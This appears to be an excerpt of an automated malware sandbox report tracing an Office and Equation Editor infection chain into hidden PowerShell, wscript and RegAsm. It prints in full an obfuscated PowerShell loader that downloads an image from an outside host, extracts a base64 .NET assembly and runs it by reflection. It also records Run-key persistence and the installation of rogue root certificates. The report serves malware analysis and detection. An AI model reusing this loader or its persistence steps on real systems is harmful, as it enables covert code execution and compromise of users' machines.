gTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\WQQ.vbs
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\WQQ.vbs	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0041CA9E LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

12_2_0041CA9E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00262DE9 push ebx; ret	8_2_00262DEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00457046 push ecx; ret	12_2_00457059
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0045B11A push esp; ret	12_2_0045B141
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0045E54D push esi; ret	12_2_0045E556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00457968 push eax; ret	12_2_00457986
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00434DB6 push ecx; ret	12_2_00434DC9

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0366047A LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_0366047A

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\WQQ.vbs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0041A998 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

12_2_0041A998

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

12_2_0041CA9E

Source: C:\Windows\SysWOW64\wscript.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
